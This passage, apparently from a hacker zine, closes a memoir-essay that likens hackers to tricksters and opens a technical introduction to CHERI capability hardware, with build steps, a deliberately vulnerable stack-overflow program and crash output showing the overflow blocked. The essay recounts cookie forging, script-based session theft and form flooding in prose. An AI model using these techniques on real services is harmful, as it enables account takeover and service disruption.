leave Offline Mode when it tried to submit my scores back to the server.
This technique worked perfectly, except when I would replace a character
with a line return, so I just avoided using them when I modified my files.
I would use the same technique later on to spoof file requests to sites that
blocked ones from outside of the domain (especially useful for downloading
multipart RAR files when paired with a download manager).  I found that I
could rearrange things that were meant to be difficult so that they became
easier for me, and I no longer needed to sacrifice myself to get them.

There was a leaderboard on the site, so I saw that there was one other
student who figured out the same trick as me because we were far faster
than anyone else.  Curiously, my first major hack was the only time I
spotted another hacker in the wild.  The moment I found myself, I also found
another like me, and it was the two of us competing against each other.
The rest of the world just fell away.  We formed a new game while everyone
else blissfully imagined that they were still participating in something
that no longer existed.

Unfortunately, my downfall began the moment the gift certificates began to
arrive. It was real, and I couldn't contain my excitement.  I imagine that
it was the same feeling as when a child first discovers that he can count to
100, overflowing with pride.  I had this new ability that brought tangible
rewards, and I began to share the news with my family.  However, the
response was not what I expected it to be.  Instead of being met with
amazement and congratulations, I was met with disappointment.  I was told
that what I was doing was wrong and that I should stop immediately.
So, I quit and hid my newly discovered talent in shame.  I suppose that such
an experience is just a rite of passage for the hacker, but I had no one to
acknowledge the virtue of such actions.  I was not recognized, so I became
invisible.  I was thrown into Tartarus.


--> 04: Olympus - Finally Being Seen

In my sophomore year in college, I got a job as a software quality tester
for a startup after hearing about an opening from a friend who had also
recently gotten a job there.  I thought it would be exciting to be a part
of the Web 2.0 boom, but the job ended up being pretty boring.  The entire
role was to follow a premade checklist and ensure that everything was
functioning as documented.
The icon is blue.  Check.
The icon turns green when clicked.  Check. 
I thought my technical skills would be useful, but this role required no
skill at all.  This job was monotonous, and I quickly began suffering from
the lack of stimulus.  Boredom is a very real form of suffering.  I
desperately needed something to happen, some randomness, so I began
looking for something to break under the guise of "quality assurance."
Soon, I found something.  I would make something happen.

As was common at that time, the front page of the site said that it was in
beta and had a contact form to join the list for the test release.
I wondered if the form sent an email or if the submissions were stored in
a database.  What would happen if I sent a flood of requests?  Something
would happen, and I would gain some new knowledge of what was going on in
the backend.  The anticipation of discovery through a bit of mischief was
the breath of fresh air I needed.  Maybe I would get fired, but this role
was already dead to me, so it was worth the risk.  On the Friday before I
left work, I placed a stapler on my enter key to continually resubmit the
form over the weekend and turned off my monitor.

When I got back on Monday, my boss learned what I had done and pulled me
aside.  He told me that I had overloaded the email server to the point
where it started smoking (I'm not sure if that was literal or not).  So, I
now knew that the form did send out emails, which did indeed mean it was
more vulnerable to attacks like the one I just pulled off with a common
office stapler. Strangely, I didn't get fired or even reprimanded.  Instead,
my boss started to tell me about how he used to frequent the old BBSs when
he was younger.  He was once a hacker from a bygone era and was trying to
tell me that he saw me for who I truly was: a hacker like him.  I was seen,
but it was not with the usual malice I encountered in school when I was
younger. I was seen for the qualities that my boss cherished about his
younger self and maybe even for ones that he felt were lost somewhere
along the way.

That recognition was transformative in many ways.  Instead of punishment for
my actions, my boss gave me a raise and a new title of "software security
tester."  My role within the system was made anew into something that
conformed to who I was instead of being made to conform to something
I wasn't.  I was allowed to be myself because I was finally seen for who I
was, and it was seen as good instead of bad.  Most importantly, I was
granted the official freedom to create and run my own tests, as opposed to
the liberty that I took for myself.  Like Hermes, the thing that I stole
somehow became legitimately recognized as mine.  

A job that was inherently lacking creativity was transformed into one of the
most creative periods of my life.  It was at this job where I used a Base64
encoder/decoder I created in JavaScript to get into other accounts by
changing the binary in two locations of the cookie.  After the developers
updated to use sessions, I worked my way up to creating a special email that
sent me the session information when users opened it.  The web app didn't
strip out embedded scripts, so I was able to hijack its functionality to
access the cookie and send it to me in an email.  My time there became a
game of cat and mouse with the architects, transcending the original purpose
of simply testing the software. Still, the unintended byproduct of that game
was better software.

Things could have gone drastically differently for me, and they did for my
friend who introduced me to the company.  Frustrated with the tedium of the
job, my friend also destroyed some equipment by ripping out keys from his
keyboard one day.  I was promoted when I destroyed a server, but my friend
ended up getting fired when he destroyed his keyboard.  Two seemingly
similar actions stemming from the same place of discontentment but yielding
two completely different outcomes.  It's like the story of Cain and Abel,
where both brothers offer up a sacrifice.  One is looked upon favorably by
God, while the other is not, and it's not entirely clear why.  If anything,
I should have been punished more severely for my more severe transgression,
but I was elevated to be something I wasn't before.


--> 05: The Uncertain Fate of the Trickster

Trickster mythology speaks to the question of how one born into the world
marked as illegitimate, cut off from the good things of society, becomes
legitimate.  The answer is that he tricks his way in.  He does something that
he was not supposed to do, so he ends up passing through where he was meant
to be excluded.  Sometimes, he succeeds.  Sometimes, he doesn't.  Yet, he is
a trickster because he does what he ought not to do.  Often, that trick is
exclusively for his own amusement, seemingly without forethought of the
potential consequences of his actions.  He pushes buttons just to see what
will happen.  Strangely, that impulsiveness will just as often result in
a gift to the world by stumbling across new wonders never before seen,
driving the culture forward.

The hacker is the modern incarnation of the trickster, finding ways to pass
through boundaries; some meant to keep him in, some meant to keep him out,
and some not meant for him at all.  He does not necessarily break the rules;
he just doesn't do what is expected.  The hacker is considered a trickster
because he then finds ways to trick the various systems of this world into
doing the unexpected as well.  Even the machine, a symbol of utmost
reliability, can be made to do something unintended.  Yet, the machine does
not just arbitrarily decide to rebel.  The machine yields to the calls of
the hacker because the hacker is firstly the one who sees something
overlooked in the machine.  There is hope in that moment.
There is potential.  The machine is first seen for what it could be,
then it becomes...something new.

Just as the machine receives a call for disobedience, so does the hacker: a
call to the wild, a call to adventure.  One mirrors the other. The hacker
yields to that call because it also resonates on a deeper level than the
standard protocols telling him how to operate.  The seeming impulsivity of
the trickster may just be giving over to that call, contrary to all the
voices telling him otherwise.  Much like the machine, obedience to that call
transforms the person in the process, enabling him to do something he was
not meant to do by getting the machine to do something it was not meant
to do.  Both are corrupted, but both are transformed.  The hacker
is simultaneously a corruptor and a liberator because he lingers in the
liminality between worlds, capable of falling into several different fates.

As a trickster, Hermes' fate also dangled between being thrown into the
abyss or being accepted into the pantheon, and the seemingly arbitrary
factor that made the difference was that Zeus was amused by Hermes' antics.
I have known both the shame of being thrown into Tartarus and the elation
of being raised to Olympus.  I have experienced two entirely different fates
in response to expressing myself through two hacks with the difference being
that I found one who was amused with my antics, lifting me out of my shame
and elevating me to be something more.  Sometimes, we are honored.
Sometimes, we are not.  True validation is from the phenomena we produce
when the system recognizes us through obedience to our instructions.
Regardless of the often arbitrary response of society, you can be confident
that even in small acts of defiance, you are reenacting the mythology of
the trickster that makes this world.  You are a hacker.

          "Here you will live a life of danger.  Creativity. 
          Perhaps not a respected life, but certainly an 
          interesting one."

          - Joseph Campbell


--> 06: Acknowledgements

I want to thank Brian Takle, who first introduced me to the concept of the
hacker as a trickster through his essays on The Matrix series.  Many of his
ideas have been floating in the back of my mind for the past 20 years,
helping me to link the phenomenological to the mythological.



|=-----------------------------------------------------------------------=|
|=--------------=[ 4 - A Hacker's Introduction to CHERI ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ xcellerator ]=----------------------------=|
|=-----------------------------------------------------------------------=|

## Introduction

For many years, there have been attempts to address the issue of "weird
machines" in the context of exploitation at "the source". People have
always disagreed on what "the source" of the problem is, and therefore have
approached the issue from various angles. For this reason, we have ended up
with a great many solutions that all work in different ways and with
different levels of efficacy. One of the newer and more unusual approaches
has been coming out of Cambridge University in the UK for a few years now,
and is named CHERI. The acronym itself stands for "Capability Hardware
Enhanced RISC Instructions", which doesn't do a whole lot to explain *what*
CHERI actually is or how it could affect binary exploitation.

The goal of this article is to introduce CHERI from a hacker's perspective 
by trying to understand why it exists in the first place, and how
it can (or perhaps will?) affect binary exploitation in the future. Coming
from academia, the CHERI project naturally uses a lot of academic language
that is sometimes tricky to parse or equate to things that the modern
day hacker is more familiar with. Hopefully by the end of this article,
you'll be able to do your own research on CHERI and even experiment with
compiling and executing CHERI code, all the while relating what you're
reading to existing concepts that you're likely already comfortable with.

A good thing to address from the outset is "why should you care?". We're
certainly used to thinking about computers at very low levels as exploit
developers, and even digging into clever hardware features like MTE or CET.
However, the central feature that this article is going to spend its time
on, the "capability", isn't even available in any commercial hardware yet,
and certainly isn't likely to pop up in your average xdev's path on their
way to root in the immediate future. And yet, I'm telling you that you
*should* care about capability computing, and not just because it's cool.

Even if tomorrow we all decided that the only code anyone would write has
to be memory-safe, it still wouldn't address the hundreds of billions of
lines of code out there that isn't (and that's probably a low-ball
estimate). If anything is going to save us, the solution is going to have
to work *with* all that code and not just require rewriting it all. CHERI
is the closest thing I've seen to addressing this problem. If all of that
doesn't convince you to read on, then maybe consider the challenge of
trying to overcome yet another clever mitigation.

To begin with, let's think about the problem that CHERI is trying to solve.

"Exploitation" is too broad a term, and academics like to be specific with
the problems that they fixate on. When you think about it - "weird
machines" in the sense of modern binary exploitation, are a kind of miracle.
If we reflect back on Turing's vision of a machine that processes an
infinite tape using a set of fixed instructions, there's a hard distinction
between the concept of "data" and "instructions" - the data being the tape,
and the instructions (or "code") being integral to the machine.

However, it wasn't long before Turing proposed the idea of the "universal
Turing machine" which could effectively be "programmed" by the tape - in
effect incorporating new instructions from the data that were a part of the
machine's input. With this stroke, the lines between code and data were
blurred - and we're still paying for it all these years later. There were
attempts to make the situation more rigorous, and we ended up with the
notions of "von Neumann" and "Harvard" architectures; the former being what
most of us are used to in our day-to-day lives where code and data all live
in the same memory, as opposed to the latter where code and data are
fundamentally different and don't as easily intermingle.

If you are writing a binary exploit for *almost* any target today then
you're most likely, either directly or indirectly, dealing with *pointers*.
This may seem like a rather obvious thing to point out (pun intended), but
it's crucial to the motivation for CHERI. If we're not leaking pointers to
bypass ASLR, we might be overflowing an index that will be added to one to
achieve an out-of-bounds read/write, or maybe we're even bringing our own
pointers to the table as part of the exploit. What if we could re-design
the architecture that our ISAs are built upon to firm up the notion of a
pointer into something more concrete, or (dare we say) *safer*? Can we do
pointers, but better? The major upside of moving protections from the
language and into the ISA is that we can continue to use our existing C/C++
codebases without having to rewrite 40+ years of software in a memory-safe
language.

One thing that might come to mind is that we could demand that a pointer
only be valid within a certain bound. Imagine if, encoded into the
pointer itself, was a range for which that pointer could be used. If we
could do that, could we also tack on some permissions bits? "This pointer
can be used to read/write data from 0x80000000 to 0x80001000, but not to
fetch instructions". Fundamentally, this is what the CHERI project refers
to as a "capability" and is responsible for the "C" in the acronym. All the
security guarantees espoused by the project centre around capabilities and
how their use is enforced and abuse is prevented.

The idea of the capability is actually a fairly old one in the history of
computing. As far back as 1978, IBM had the System/38 minicomputer which
supported a kind of capability addressing termed "authorized pointers".
These pointers could only be created by privileged instructions and encoded
their permissions into themselves. However, there wasn't a way to modify
these objects once they were created, which led to unfortunate issues
where permissions couldn't be revoked once given. The System/38 was
retired in 1988.

Despite this, and a few other attempts over the years, capabilities
haven't really taken off. The difference with CHERI is that instead of
creating a bespoke new architecture, the team at Cambridge is attempting to
"enhance" existing ISAs with capability addressing.

At this point, you may well be thinking that turning pointers into pointer/
metadata hybrids isn't that much of a big deal if you can still "bring your
own pointers" to an exploit. Surely you could just overwrite some
capability in memory with a capability of your own that says "This pointer
can be used to read/write/fetch to and from anywhere"? In order for this
idea to have any legs, we need to also prevent capabilities from being
forged. To explain this further, let's solidify our notion of capabilities a
bit so that we know what it is that we're trying to prevent from being
forged or manipulated.

Let's assume we have a 64-bit system, say Aarch64. All our registers (where
pointers must go to be dereferenced) are 64 bits wide, so we'll need to
widen them a bit to support the extra metadata that we want to cram in.
CHERI does this by simply doubling the register width so now our registers
are 128 bits wide instead. Note that the ALU is untouched, so you don't get
128-bit integers and can't do 128-bit logical or arithmetical operations
natively with this change. We can make our lives a little easier by also
demanding that every capability is 128-bit aligned in memory. This is
important because it means that *every aligned 128-bit region of memory
could be a capability*. Then again, it might not be, so we need to devise a
way to keep track of which of these regions are capabilities and which
aren't.

The simplest (for some definition of "simple") solution is to offload this
responsibility to the memory controller. We make the demand that the memory
controller maintain a state which governs where all the valid capabilities
currently are in memory. When the CPU reads from memory into a register, it
will also be told whether that read was a capability or not. If an attempt
is made to dereference a value stored in a register, and this "tag" bit
isn't set, then the CPU will trigger an exception. Also - and this is very
important - whenever a write to memory is performed, the memory controller
*must* clear the associated tag bit for that region, unless the CPU
explicitly asks the memory controller to set the tag bit again afterwards,
for instance when a legitimate capability is created.

This means that any attempt to modify a capability in memory will clear the
tag bit so that a CPU exception will trigger if the program tries to later
dereference that capability.

Woah, woah, woah slow down. There's a lot to unpack here and several
questions should hopefully be raised in your head. First of all, how on
Earth is the CPU supposed to tell the memory controller what is a
legitimate capability modification? There are plenty of programs that will
perform pointer arithmetic, and wasn't the whole point of this thought
exercise to devise a way to limit the viability of exploitation without
having to rewrite 50+ years of software? And while we're at it, where are
these tag bits supposed to be kept anyway?

The answer to the first of these questions is *reasonably* straightforward,
and the clue is once again in the CHERI acronym: Capability Hardware
Enhanced RISC *Instructions*. The instruction sets themselves for our
target ISAs are augmented to support all these CHERI protections that we've
been discussing. This is a crucial point - you may not have to rewrite your
software to support CHERI, but you will need to recompile it with a CHERI-
aware compiler. The various CHERI specifications allow for a CHERI-aware
CPU to have its CHERI protections switched on-and-off, meaning that you
can run "legacy" (read: "non-CHERI") code alongside CHERI instructions.
This means that you could have a CHERI-hardened kernel alongside some core
system utilities, but still run programs that use the standard ISA (or even
vice-versa: a legacy kernel but have userland applications make use of
CHERI). We'll come back to these instructions and how they work a little
later.

As far as the second question goes, there are a couple of options we could
take. The simplest (there goes that word again) is to let the memory
controller use something it's already got lots of: memory. A small pocket
of memory can be reserved that isn't addressable at all (and therefore
completely invisible to any code running on the CPU) which can be used to
store a single bit for every 128-bit region of memory. If the bit is set,
then the corresponding region contains a capability, and if the bit is
cleared, then the memory just contains data. While fairly straightforward,
this approach can create issues with memory latency due to the controller
having to check the tag bits (which necessarily live in different DRAM
rows) for *every* access. Therefore another proposed solution is to make
use of the additional bits present in ECC RAM. The precise method employed
to store the tag bits doesn't matter a whole lot to the would-be CHERI
exploit-writer, we just have to keep in mind that we are in all likelihood
unable to touch those bits.

So, let's take a bit of a review because we've covered a lot of ground
already. Under CHERI, pointers have been replaced by capabilities and the
memory controller is doing a lot of extra work to keep track of where
capabilities are in RAM, as well as turning capabilities into regular ol'
data as soon as they're modified in any unsanctioned or unexpected way.
And to top it all off, we've got some extra instructions to play with to
support all of this. Don't forget that registers are also now twice as wide
as they used to be.

What do we even call this model of computing? It's not quite von Neumann
because code and data aren't completely interchangeable anymore (pointers
aren't really code, but they're also not really data either anymore). It's
also not quite Harvard either because code and data still live together
side-by-side. We're somewhere in the middle. Personally I feel like we're
still closest in spirit to von Neumann computing, but there's definitely a
few shades of grey now.

Congratulations - there's the theory out of the way. Let's get down to some
solid examples of how CHERI works and how it could make our lives harder as
exploit-writers.

## Building and running CheriBSD for Morello

One of the early specifications of CHERI for an ISA was for Aarch64, which
has been dubbed by Arm as "Morello" [1,2]. Physical hardware apparently
does exist, but it's in a developmental stage and seemingly very difficult
to get your hands on. The CHERI team in Cambridge have produced a modified
version of QEMU to support all the CHERI functionality, as well as a fork 
of LLVM that can emit CHERI instructions. They've also bundled all of this 
up into a git repo that lets you easily build everything you need to get a
"CheriBSD" VM running. When building all of this, we have two options to
choose from: whether to allow legacy non-CHERI instructions into the mix,
called "hybrid" mode, or to only allow CHERI instructions to be executed in
our VM, which is referred to as "purecap" mode (short for "pure-
capability").

Seeing as this is an article all about CHERI and how it could affect the
writers of binary exploits, let's stick with purecap mode to make sure
we're getting the full effect. This means that the CheriBSD kernel and
userland will be built with CHERI Aarch64 instructions.

To start with, head over to the CHERIBuild GitHub repo [3], install any of
the OS-specific dependencies you need and clone the repo somewhere. There
are a few things that we need to build, so it might take a while. To get
started, run the following (in order):

./cheribuild.py qemu --include-dependencies
./cheribuild.py cheribsd-morello-purecap --include-dependencies
./cheribuild.py gdb-morello-hybrid-for-purecap-rootfs \
      --include-dependencies
./cheribuild.py disk-image-morello-purecap --include-dependencies


Now we have a bootable disk image for CheriBSD that includes gdb. If you
have any SSH public keys in your `~/.ssh`, when `cheribuild.py` creates the
disk image, it should prompt you if you want to automatically copy them
into `authorized_keys` in the CheriBSD image. This is a good idea because
it means we'll be able to SSH into the Cheri VM, which will give us a nicer
environment than the QEMU console, as well as letting us use SCP to copy
our cross-compiled executables over.

Finally, at long last we can boot CheriBSD under QEMU:

./cheribuild.py run-morello-purecap


It will take a little while to boot, but once we're in (username "root",
no password), we can see that for the most part it looks and feels exactly
like regular FreeBSD. Here are a few things to note:
  * If you want to shut down the VM, the keyboard shortcut to kill a QEMU
    console session is `Ctrl+a; x`.
  * CheriBSD should have automatically spawned an SSH server for us which
    QEMU should have port forwarded to 10005 for us. If you copied your
    keys into the CheriBSD rootfs during the `disk-image-morello-purecap`
    step, you should be able to just `ssh -p 10005 root@localhost` from
    your host.

## Compiling programs for CheriBSD

Let's set ourselves up so that we can easily compile simple programs to
start probing how CHERI works. The current CHERI buildsystem is a bit
convoluted (e.g. going through `cheribuild.py`) but we're only going to
write a few short C programs that don't need all the heavy lifting that
provides. If you *do* want to explore more complex programs, then I suggest
you dive into how `cheribuild.py` works, but that's beyond the scope of
this article. It's worth pointing out that several open source projects can
already be built such as FFmpeg, Nginx, or even the Plasma desktop with
Wayland.

After running all the commands above, you'll have a `~/cheri` directory
with all the artifacts of the build. Staying in the `cheribuild` directory,
we'll create a folder called `vuln` where we'll store our intentionally
vulnerable programs. We'll *also* create a `vuln` folder in the CheriBSD VM
to keep things tidy. Create a shell script called `build.sh` in your
*HOST'S* `vuln` folder (i.e. under `cheribuild/`) with the following
contents:

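#!/bin/sh
# Cross-compile a C file for purecap CheriBSD and copy it into the VM.

if [ "$#" -ne 2 ]; then
    echo "Usage: $0 input.c output"
    exit 1
fi

# Build with the Morello SDK's clang against the purecap rootfs. The
# upload below only runs if the build succeeds (QEMU forwards SSH on 10005).
"$HOME/cheri/output/morello-sdk/bin/clang" \
    -target aarch64-unknown-freebsd13 \
    --sysroot="$HOME/cheri/output/rootfs-morello-purecap" \
    -B "$HOME/cheri/output/morello-sdk/bin" \
    -mcpu=rainier \
    -march=morello \
    -mabi=purecap \
    -Xclang -morello-vararg=new \
    -Xclang -morello-bounded-memargs \
    -Wall \
    -Wcheri \
    -g \
    -fuse-ld=lld \
    -o "$2" \
    "$1" &&

scp -P 10005 "$2" "root@localhost:vuln/$2"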


Now we can write C programs on our host system and compile/upload them with
`./build.sh input.c output`! Let's crack on and explore CHERI...

## Capability Encoding

At this point, for our own understanding we should probably take a quick
look at what is contained in these extra bits of CHERI registers. The
precise encoding format for each CHERI-supported architecture varies a
little, but largely includes the same information. Note that whenever we
need to dissect a capability for its metadata, it's MUCH easier to just
rely on either GDB or the handy `%#p` format-specifier (more on that
shortly) to format it for us. But we're exploit developers, so we should
still have a solid understanding of how things work even if we'll end up
making the computer do the hard work for us. For Morello, a capability
register is defined as [3; Section 2.5]:

<- Bit 128                                                         Bit 0 ->
+-+--------+--------+----------------+-----+------------------------------+
|T| Permi- | Object |     Bounds     |Flags|           Bounds             |
| | ssions |  Type  |     (Upper)    |     |           (Lower)            |
+-+--------+--------+----------------+-----+------------------------------+
|T| Permi- | Object |     Bounds     |Flags|            Value             |
| | ssions |  Type  |     (Upper)    |     |                              |
+-+--------+--------+----------------+-----+------------------------------+

* First comes the `T` bit which is the "tag bit" that we were talking about
earlier. This is the bit that indicates whether the value in the register
is a valid capability or not. The architecture specifies that this bit
isn't actually loadable in the normal sense (being bit 128, it's really the
129th bit yet we can only load 128 bits into a register), but instead comes
from the corresponding tag bit that the memory controller is responsible
for providing during loads/stores. This bit CAN be set by the CPU using
special instructions, for example when a new capability is being created
intentionally.

* Next up are the "Permissions" bits, of which there are 18 defined. 
The format is as follows:
+-----+------------------+------------------------------------------------+
| Bit |    Permission    | Meaning                                        |
+-----+------------------+------------------------------------------------+
| 17  |       Load       | Can load bytes from memory                     |
| 16  |      Store       | Can store bytes into memory                    |
| 15  |     Execute      | Can fetch instructions from memory             |
| 14  |     LoadCap      | Can load a capability to a register            |
| 13  |     StoreCap     | Can store a capability from a register         |
| 12  |   StoreLocalCap  | Can store a "local" (see "Global" below)       |
|     |                  | capability from a register                     |
| 11  |       Seal       | Can "seal" an unsealed capability              |
| 10  |      Unseal      | Can "unseal" a sealed capability               |
|  9  |      System      | Can access system registers                    |
|  8  | BranchSealedPair | Can be used by a "branch sealed pair"          |
|     |                  | instruction                                    |
|  7  |   CompartmentID  | Indicates that this capability is a            |
|     |                  | "compartment" ID                               |
|  6  |    MutableLoad   | Loading a capability using a capability without|
|     |                  | this bit will clear the Store* and MutableLoad |
|     |                  | permissions                                    |
| 5-2 |     User[3:0]    | Software-defined                               |
|  1  |     Executive    | Indicates an instruction fetch executes in     |
|     |                  | executive vs restrictive mode (visibility of   |
|     |                  | global registers)                              |
|  0  |      Global      | Indicates whether this capability is local/    |
|     |                  | global                                         |
+-----+------------------+------------------------------------------------+

There are a couple of terms in the above table that we haven't covered yet
(and some we won't cover). Don't worry too much for now: if we don't cover
something in this article, by the time you reach the end you'll be able to
go and research it further.

* Following the permissions is the "ObjectType" (15 bits) which indicates
whether and how a capability is "sealed". A sealed capability is one that
is valid (i.e. it is recognised as a capability), but is not allowed to be
used (apart from being unsealed). This is useful, for example, when passing
capabilities between different contexts or threads. The use of sealed
capabilities is important in "CHERI compartmentalisation". Associating an
ObjectType with a sealed capability allows for finer granularity in
identifying sealed capabilities with "types".

* The encoding of the "Bounds" field is pretty complex. If you want to read
up on it yourself, see [3; Section 2.5.1], but for the purposes of this
article, suffice to say that the bounds field potentially takes up 87 bits
and overlaps with the value and flags fields. Determining the bounds of a
capability depends on the context.

* The "Flags" field is just 8 bits and is up to the user to decide if and
how to use. There are CHERI instructions like `BICFLG` for Aarch64 (bit-
wise clear immediate on flags) for operating directly on this field without
clearing the tag bit.

* Lastly, the "Value" field comprises the lower 64 bits of the capability.
As the name indicates, this is the actual value that we think of
numerically being stored in the register. It could be an integer (in the
case where we have data rather than a capability) or a memory address (in
the event where we DO have a capability).

This all may seem like a lot but, as you'll see in our examples, we really
don't need to spend any time decoding capabilities manually, and any
information that we *do* need is very easy to extract.
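
To make the field layout a little more concrete, here is a minimal sketch
in C that pulls the permissions out of a raw capability. It assumes the
permissions occupy the top 18 bits of the upper 64-bit half (bits 127..110,
which is what the field order above suggests). The names `cap_perms` and
`perm_string` are made up for this illustration, and the output only covers
the five permissions that show up as `r`, `w`, `x`, `R` and `W`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bit positions copied from the permissions table above (subset only). */
enum cap_perm {
    PERM_STORECAP = 1u << 13,
    PERM_LOADCAP  = 1u << 14,
    PERM_EXECUTE  = 1u << 15,
    PERM_STORE    = 1u << 16,
    PERM_LOAD     = 1u << 17
};

/* ASSUMPTION: the 18 permission bits are bits 127..110 of the capability,
 * i.e. the top 18 bits of the upper 64-bit half `hi`. */
uint32_t cap_perms(uint64_t hi) {
    return (uint32_t)(hi >> 46) & 0x3ffffu;
}

/* Render a simplified permission string: lower-case for data, upper-case
 * for capabilities. `buf` must have room for at least 6 bytes. */
const char *perm_string(uint32_t perms, char *buf, size_t len) {
    size_t n = 0;

    assert(len >= 6);
    if (perms & PERM_LOAD)     buf[n++] = 'r';
    if (perms & PERM_STORE)    buf[n++] = 'w';
    if (perms & PERM_EXECUTE)  buf[n++] = 'x';
    if (perms & PERM_LOADCAP)  buf[n++] = 'R';
    if (perms & PERM_STORECAP) buf[n++] = 'W';
    buf[n] = '\0';
    return buf;
}
```

As a sanity check, the raw register value that GDB prints for a stack
capability later in this article has `0xdc5d40007f00fef0` as its upper
half. Passing that through `cap_perms()` and `perm_string()` gives `rwRW`,
and the lower half (`0x0000fffffff7ff00`) is the value field as-is.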

## Vulnerable Programs

### A Simple Stack Buffer Overflow

Let's start by trying to exploit the canonical stack buffer overflow, which
we'll call `stack.c`:

#include <stdio.h>
#include <string.h>

void __attribute__((noinline)) overflow(char* src) {
    char buffer[16];
    printf("buffer @ %#p\n", (char*)&buffer);
    strcpy(buffer, src);
}

int main(int argc, char** argv) {
    if (argc >= 2) {
        printf("Calling overflow()\n");
        overflow(argv[1]);
        printf("Returned from overflow()\n");
    }

    return 0;
}


Two things to notice briefly:
  * We use the `noinline` attribute on `overflow()` to prevent Clang from
    optimising out the function call.
  * When we print `&buffer` (which is a CAPABILITY), we use the `%#p`
    format specifier. This is specific to the CHERI SDK and will print the
    metadata about the capability in a pretty way.

We can compile and upload this with: `./build.sh stack.c stack`. Over in
the VM, we should now have a `~/vuln/stack` binary waiting for us. The
program itself should be fairly obvious - passing an argument of more than
16 bytes will overflow the `buffer` array in the `overflow()` function...
*or will it?* Let's run it and see what happens!

root@cheribsd-morello-purecap:~/vuln # ./stack 01234
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
Returned from overflow()


Let's dissect this as it's our first actual capability:

buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
         |               |    |
         |               |    +---------> The range that the capability is
         |               |                valid for.
         |               |
         |               +--------------> The permissions: lower-case are
         |                                for data, upper-case for
         |                                capabilities.
         |
         +------------------------------> The "pointer"-component.


So, we can see that `&buffer` is bounded to only be able to access bytes in
the range `0xfffffff7fef0-0xfffffff7ff00`, which matches the size of the
`buffer` array in our program: 16 bytes. Furthermore, this capability can
be used to read and write both data and capabilities from this range, but
notably it *cannot fetch instructions*. Let's see what happens if we try to
run the program again, but supply it enough bytes to overflow `buffer`:

root@cheribsd-morello-purecap:~/vuln # ./stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
In-address space security exception (core dumped)


Hmm, okay - we crashed. Not entirely unexpected, but let's find out why.
Fortunately we built GDB for CheriBSD so we can take a look at the coredump
that got generated.

root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack stack.core
Reading symbols from ./stack...
[New LWP 100085]
Core was generated by `./stack 0123456789abcdef'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability bounds fault.
#0  0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
        0xfffffff7ff00] "\210\375\367\277\377\377", from=<optimized out>)
    at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48


As we may have guessed, our call to `strcpy()` triggered a CHERI exception,
and that's why the kernel killed our process. We can disassemble the
`overflow` function in GDB to get a closer look at the CHERI-augmented
Aarch64 instructions. However, it's probably easier for us to do this
analysis outside of CheriBSD. Fortunately, when we built the Morello SDK, a
version of binutils was compiled with Aarch64 CHERI support which lives in
`~/cheri/output/morello-sdk/bin/`. If you prefer to disassemble your
compiled binaries outside of the VM, then `objdump` in this directory will
work as expected. Alternatively, you can just `disas overflow` in GDB if
you prefer.

00000000000108e0 <overflow>:
   108e0: 028183ff      sub     csp, csp, #96
   108e4: 42827bfd      stp     c29, c30, [csp, #64]
   108e8: 020103fd      add     c29, csp, #64
   108ec: 020083e1      add     c1, csp, #32
   108f0: c2c83821      scbnds  c1, c1, #16             // =16
   108f4: c20007e1      str     c1, [csp, #16]
   108f8: a21f03a0      stur    c0, [c29, #-16]
   108fc: c2c1d3e0      mov     c0, csp
   10900: c2000001      str     c1, [c0, #0]
   10904: c2c83809      scbnds  c9, c0, #16             // =16
   10908: 90800080      adrp    c0, 0x20000 <main+0x18>
   1090c: c2428400      ldr     c0, [c0, #2576]
   10910: 94000034      bl      0x109e0 <printf@plt>
   10914: c24007e0      ldr     c0, [csp, #16]
   10918: a25f03a1      ldur    c1, [c29, #-16]
   1091c: 94000035      bl      0x109f0 <strcpy@plt>
   10920: 42c27bfd      ldp     c29, c30, [csp, #64]
   10924: 020183ff      add     csp, csp, #96
   10928: c2c253c0      ret     c30
   1092c: d503201f      nop


Now, even if you're somewhat familiar with Aarch64 assembly, this probably
looks quite strange to you. Not to worry - this really is Aarch64
assembly, but just has a few extras added on. Seeing as this is our first
crash in CHERI code, let's walk through what's going on.

The first four instructions in the prologue to `overflow()` at first appear
to be pretty familiar; namely `sub`, `stp` and two `add`s. However, upon
closer inspection we see that the registers in these instructions aren't
the familiar Aarch64 ones. Instead, they've been replaced by `c`-variants,
which are the CHERI-ised double-width versions that we've already talked
about. As you might expect, `csp` is the "CHERI stack pointer" and `c1`,
`c29`, `c30`, etc are just CHERI versions of `x1`, `x29`, `x30`, and so on.
The CHERI forms of most of the usual Aarch64 instructions continue to
behave in the natural way: `add c29, csp, #64` will add the immediate `64`
to `csp` and store the result in `c29`. Remember that the ALU still only
works with 64-bit integers, so the capability metadata part of the
registers isn't included in the addition. However, the CPU will
automatically preserve the tag bit when necessary (for example when a
program intentionally performs pointer arithmetic on a capability). This
is an important point to keep in mind - manipulation of capabilities that
are already in registers *doesn't clear the tag bit*.

Then, at `0x108f0` we encounter our first truly CHERI-unique instruction:
`scbnds c1, c1, #16`. The SCBNDS mnemonic is short for "Set CHERI Bounds"
and with that knowledge you can maybe guess that this instruction sets the
capability bounds on register `c1` (which is computed as a 32-byte offset
from the stack pointer `csp` in the instruction just prior) to the
immediate `16`. In the context of our program, that makes perfect sense: in
`overflow()` we declared an array of `char`s called `buffer` on the stack
to be exactly `16` bytes in size. All in all, the `buffer` capability ends
up being stored in register `c1` after the instruction at `0x108f0`
executes.
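
If it helps, the effect of the `add` and `scbnds` pair can be modelled in
plain C. This is only a toy: `struct cap` is a made-up, uncompressed
stand-in for the real 129-bit encoding, and the rule that an over-wide
bounds request yields an untagged result is my assumption about how the
instruction behaves, not something we've demonstrated above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy capability: NOT the real compressed encoding. */
struct cap {
    uint64_t value;  /* the "pointer" part */
    uint64_t base;   /* lowest address the capability may touch */
    uint64_t limit;  /* one past the highest address it may touch */
    bool     tag;    /* true while the capability is valid */
};

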